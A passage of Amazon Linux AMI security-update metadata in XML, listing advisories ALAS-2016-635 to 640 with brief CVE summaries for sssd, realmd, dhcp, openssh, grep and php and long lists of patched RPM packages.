name="samba-client-libs" version="4.2.3" release="11.28.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.2.3" release="11.28.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.2.3-11.28.amzn1.noarch.rpm</filename></package><package name="samba-test" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.2.3" release="11.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.2.3-11.28.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.2.3" release="11.28.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-debuginfo-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-test-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.2.3-11.28.amzn1.i686.rpm</filename></package><package 
name="samba-common-tools" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.2.3-11.28.amzn1.i686.rpm</filename></package><package name="ctdb-devel" version="4.2.3" release="11.28.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-devel-4.2.3-11.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-635</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-635: low priority package update for sssd</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5292:
It was found that SSSD&#039;s Privilege Attribute Certificate (PAC) responder plug-in would leak a small amount of memory on each authentication request. A remote attacker could potentially use this flaw to exhaust all available memory on the system by making repeated requests to a Kerberized daemon application configured to authenticate using the PAC responder plug-in.
1267580:
CVE-2015-5292 sssd: memory leak in the sssd_pac_plugin
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5292" title="" id="CVE-2015-5292" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libsss_nss_idmap-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.13.0" release="40.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.13.0-40.6.amzn1.noarch.rpm</filename></package><package name="libipa_hbac" version="1.13.0" release="40.6.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libipa_hbac-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.13.0" release="40.6.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/sssd-common-pac-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.13.0-40.6.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd" version="1.13.0" release="40.6.amzn1" epoch="0" 
arch="i686"><filename>Packages/sssd-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.13.0" 
release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.13.0" release="40.6.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.13.0-40.6.amzn1.i686.rpm</filename></package><package name="sssd-client" version="1.13.0" release="40.6.amzn1" epoch="0" 
arch="i686"><filename>Packages/sssd-client-1.13.0-40.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-636</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-636: medium priority package update for realmd</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2704:
A flaw was found in the way realmd parsed certain input when writing configuration into the sssd.conf or smb.conf file. A remote attacker could use this flaw to inject arbitrary configurations into these files via a newline character in an LDAP response.
1205752:
CVE-2015-2704 realmd: untrusted data is used when configuring sssd.conf and/or smb.conf
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2704" title="" id="CVE-2015-2704" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="realmd-devel-docs" version="0.16.1" release="5.5.amzn1" epoch="0" arch="noarch"><filename>Packages/realmd-devel-docs-0.16.1-5.5.amzn1.noarch.rpm</filename></package><package name="realmd-debuginfo" version="0.16.1" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/realmd-debuginfo-0.16.1-5.5.amzn1.x86_64.rpm</filename></package><package name="realmd" version="0.16.1" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/realmd-0.16.1-5.5.amzn1.x86_64.rpm</filename></package><package name="realmd-debuginfo" version="0.16.1" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/realmd-debuginfo-0.16.1-5.5.amzn1.i686.rpm</filename></package><package name="realmd" version="0.16.1" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/realmd-0.16.1-5.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-637</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-637: medium priority package update for dhcp</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8605:
1297314:
CVE-2015-8605 dhcp: UDP payload length not properly checked
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8605" title="" id="CVE-2015-8605" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp-common" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-638</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-638: medium priority package update for openssh</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0778:
A buffer overflow flaw was found in the way the OpenSSH client roaming feature was implemented. A malicious server could potentially use this flaw to execute arbitrary code on a successfully authenticated OpenSSH client if that client used certain non-default configuration options.
1298033:
CVE-2016-0778 OpenSSH: Client buffer-overflow when using roaming connections
CVE-2016-0777:
An information leak flaw was found in the way the OpenSSH client roaming feature was implemented. A malicious server could potentially use this flaw to leak portions of memory (possibly including private SSH keys) of a successfully authenticated OpenSSH client.
1298032:
CVE-2016-0777 OpenSSH: Client Information leak due to use of roaming connection feature
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0777" title="" id="CVE-2016-0777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0778" title="" id="CVE-2016-0778" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.9.3" release="9.23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="openssh" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" 
release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.23.59.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.23.59.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-23.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-639</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-639: low priority package update for grep</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1345:
A heap-based buffer overflow flaw was found in the way grep processed certain pattern and text combinations. An attacker able to trick a user into running grep on specially crafted input could use this flaw to crash grep or, potentially, read from uninitialized memory.
1183651:
CVE-2015-1345 grep: heap buffer overrun
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1345" title="" id="CVE-2015-1345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="grep-debuginfo" version="2.20" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/grep-debuginfo-2.20-1.16.amzn1.x86_64.rpm</filename></package><package name="grep" version="2.20" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/grep-2.20-1.16.amzn1.x86_64.rpm</filename></package><package name="grep-debuginfo" version="2.20" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/grep-debuginfo-2.20-1.16.amzn1.i686.rpm</filename></package><package name="grep" version="2.20" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/grep-2.20-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-640</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-640: medium priority package update for php56 php55</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1903:
1297717:
CVE-2016-1903 php: Out-of-bounds memory read via gdImageRotateInterpolated
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1903" title="" id="CVE-2016-1903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mbstring" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.31" 
release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.17" release="1.120.amzn1" epoch="0" 
